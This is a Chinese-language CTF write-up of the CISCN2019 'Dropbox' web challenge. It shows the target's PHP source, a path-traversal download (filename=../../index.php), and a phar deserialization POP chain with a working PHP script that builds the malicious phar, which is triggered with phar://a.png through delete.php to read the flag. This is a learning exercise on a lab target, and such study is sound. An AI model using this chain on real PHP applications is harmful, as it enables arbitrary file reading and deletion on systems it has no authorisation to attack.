# [CISCN2019 华北赛区 Day1 Web1] Dropbox
巨抽象的题:
# 知识点:phar 反序列化
Phar 反序列化_葫芦娃 42 的博客 - CSDN 博客
一进来就是注册
有两个选项:一个下载,一个删除。
# 一般看见下载 / 删除,都会有一个 download.php 可能会存在任意文件下载的漏洞
# ![3]()
通过测试,发现 filename 参数可控 下载 index.php 发现文件不存在,可能是路径原因 通过测试,index.php 在其上级目录的上级目录
filename=…/…/index.php
看见 index.php 里 include 了 class.php
class.php:
<?php | |
error_reporting(0); | |
$dbaddr = "127.0.0.1"; | |
$dbuser = "root"; | |
$dbpass = "root"; | |
$dbname = "dropbox"; | |
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname); | |
class User { | |
public $db; | |
public function __construct() { | |
global $db; | |
$this->db = $db; | |
} | |
public function user_exist($username) { | |
$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;"); | |
$stmt->bind_param("s", $username); | |
$stmt->execute(); | |
$stmt->store_result(); | |
$count = $stmt->num_rows; | |
if ($count === 0) { | |
return false; | |
} | |
return true; | |
} | |
public function add_user($username, $password) { | |
if ($this->user_exist($username)) { | |
return false; | |
} | |
$password = sha1($password . "SiAchGHmFx"); | |
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);"); | |
$stmt->bind_param("ss", $username, $password); | |
$stmt->execute(); | |
return true; | |
} | |
public function verify_user($username, $password) { | |
if (!$this->user_exist($username)) { | |
return false; | |
} | |
$password = sha1($password . "SiAchGHmFx"); | |
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;"); | |
$stmt->bind_param("s", $username); | |
$stmt->execute(); | |
$stmt->bind_result($expect); | |
$stmt->fetch(); | |
if (isset($expect) && $expect === $password) { | |
return true; | |
} | |
return false; | |
} | |
public function __destruct() { | |
$this->db->close(); | |
} | |
} | |
class FileList { | |
private $files; | |
private $results; | |
private $funcs; | |
public function __construct($path) { | |
$this->files = array(); | |
$this->results = array(); | |
$this->funcs = array(); | |
$filenames = scandir($path); | |
$key = array_search(".", $filenames); | |
unset($filenames[$key]); | |
$key = array_search("..", $filenames); | |
unset($filenames[$key]); | |
foreach ($filenames as $filename) { | |
$file = new File(); | |
$file->open($path . $filename); | |
array_push($this->files, $file); | |
$this->results[$file->name()] = array(); | |
} | |
} | |
public function __call($func, $args) { | |
array_push($this->funcs, $func); | |
foreach ($this->files as $file) { | |
$this->results[$file->name()][$func] = $file->$func(); | |
} | |
} | |
public function __destruct() { | |
$table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">'; | |
$table .= '<thead><tr>'; | |
foreach ($this->funcs as $func) { | |
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>'; | |
} | |
$table .= '<th scope="col" class="text-center">Opt</th>'; | |
$table .= '</thead><tbody>'; | |
foreach ($this->results as $filename => $result) { | |
$table .= '<tr>'; | |
foreach ($result as $func => $value) { | |
$table .= '<td class="text-center">' . htmlentities($value) . '</td>'; | |
} | |
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>'; | |
$table .= '</tr>'; | |
} | |
echo $table; | |
} | |
} | |
class File { | |
public $filename; | |
public function open($filename) { | |
$this->filename = $filename; | |
if (file_exists($filename) && !is_dir($filename)) { | |
return true; | |
} else { | |
return false; | |
} | |
} | |
public function name() { | |
return basename($this->filename); | |
} | |
public function size() { | |
$size = filesize($this->filename); | |
$units = array(' B', ' KB', ' MB', ' GB', ' TB'); | |
for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024; | |
return round($size, 2).$units[$i]; | |
} | |
public function detele() { | |
unlink($this->filename); | |
} | |
public function close() { | |
return file_get_contents($this->filename); | |
} | |
} | |
?> |
download.php::
<?php | |
session_start(); | |
if (!isset($_SESSION['login'])) { | |
header("Location: login.php"); | |
die(); | |
} | |
if (!isset($_POST['filename'])) { | |
die(); | |
} | |
include "class.php"; | |
ini_set("open_basedir", getcwd() . ":/etc:/tmp"); | |
chdir($_SESSION['sandbox']); | |
$file = new File(); | |
$filename = (string) $_POST['filename']; | |
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) { | |
Header("Content-type: application/octet-stream"); | |
Header("Content-Disposition: attachment; filename=" . basename($filename)); | |
echo $file->close(); | |
} else { | |
echo "File not exist"; | |
} | |
?> |
delete.php:
<?php | |
session_start(); | |
if (!isset($_SESSION['login'])) { | |
header("Location: login.php"); | |
die(); | |
} | |
if (!isset($_POST['filename'])) { | |
die(); | |
} | |
include "class.php"; | |
chdir($_SESSION['sandbox']); | |
$file = new File(); | |
$filename = (string) $_POST['filename']; | |
if (strlen($filename) < 40 && $file->open($filename)) { | |
$file->detele(); | |
Header("Content-type: application/json"); | |
$response = array("success" => true, "error" => ""); | |
echo json_encode($response); | |
} else { | |
Header("Content-type: application/json"); | |
$response = array("success" => false, "error" => "File not exist"); | |
echo json_encode($response); | |
} | |
?> |
可以定义了很多类,那考点肯定就是序列化反序列化这里了。 审计代码,file_get_contents () 函数 $filename 参数没有过滤,肯定是通过此得到 flag。
定义的是 close 函数,我们看看哪里调用了这个 close()
发现在 User 类里的__destruct () 调用了 close ()。寻找可以触发 __destruct 的 unserialize (). 没有。
这里就考到了 phar 反序列化:phar:// 伪协议,我们便不再需要 unserialize (),phar 的特性,他在解析 phar 文件时时会自动对里面的内容进行反序列化。 再有 前面只允许上传图片,phar 可以解析 png 后缀,因此考点肯定是 phar 反序列化。
在 File 类中的 open () 方法,会给 $this-filename = $filename. download.php 和 delete.php 里存在 但是 download.php 会受到 init_set (“openbase_dir”,) 的限制,因此只有 delete.php 可以触发 phar 反序列化。 里面的 $file->open () 里的 file_exists () 函数 和 $file->delete () 的 unlink () 函数会触发 phar 反序列化
开始找 pop 链子:
1. 肯定是 close 方法里的 file_get_contents 函数,在 File 类中,close 方法存在 file_get_contents () 函数,在 User 中,会调用改方法 $this->db->close (),如果有回显的化,我们就可以直接构造如下 payload:
<?php | |
class User { | |
public $db; | |
} | |
class File { | |
public $filename = "/flag.txt"; | |
} | |
$a = new User(); | |
$a->db = new File(); | |
?> |
生成对应的 phar 文件即可。
生成 phar 文件的脚本:
<?php
class User {
public $db;
}
class FileList {
private $files;
public function __construct()
{
$this->files = array(new File());
}
}
class File {
public $filename = '/flag.txt';
}
$a = new User();
$a->db = new FileList();
@unlink('test.phar');
$phar=new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata($a);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
?>
但是没有回显,那么我们就让 $this->db = new FileList (),让它去调用 close。然而当执行 FileList->close () 时,因为 FileList 类中没有 close () 这个方法所以会调用 FileList->_call () 从而遍历全文件找 close () 方法
public function __call($func, $args) { | |
array_push($this->funcs, $func); | |
foreach ($this->files as $file) { | |
$this->results[$file->name()][$func] = $file->$func(); | |
} | |
} |
看一下这个 call 函数,它会把 close 当成参数传入 $func, $this->func () 的结果会被赋值给 file->name ()] 这个一维数组,即我们的 file_get_contents (’/flag.txt’) , 构成了一个 this->results [文件名][‘close’]) 学过 c 语言 二维数组更好理解一点。 这个二维数组中的 $this->results [’/flag.txt’][‘close’] 即为我们的 flag
调用完__call (),$this->results 二维数组赋值完之后。然后再调用 __destruct () 函数 去输出我们的 flag
public function __destruct() { | |
$table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">'; | |
$table .= '<thead><tr>'; | |
foreach ($this->funcs as $func) { | |
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>'; | |
} | |
$table .= '<th scope="col" class="text-center">Opt</th>'; | |
$table .= '</thead><tbody>'; | |
foreach ($this->results as $filename => $result) { | |
$table .= '<tr>'; | |
foreach ($result as $func => $value) { | |
$table .= '<td class="text-center">' . htmlentities($value) . '</td>'; | |
} | |
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>'; | |
$table .= '</tr>'; | |
} | |
echo $table; | |
} |
foreach ($this->results as $filename => result, 即 $this-results [filename][]
foreach ($result as $func => value
最终 echo $table 打印出来全部数据
链子:
User->_destruct => FileList->close() => FileList->_call('close') => File->close('/flag.txt') => $results=file_get_contents('flag.txt') => FileList->_destruct() => echo $result
注:download.php 文件中 open_basedir 限制了当前程序可以访问的目录
ini_set("open_basedir", getcwd() . ":/etc:/tmp"); |
因此我们只能用 delete.php 去触发 phar 反序列化
生成的 phar 文件后缀为 png 上传,
传入 filename=phar://a.png
成功 $value 带出来,把 flag 回显出来了 得到 flag
(题目无敌了,我还只是个练习时长不足 1 年的菜鸡~~~,呜呜呜,裂开哩)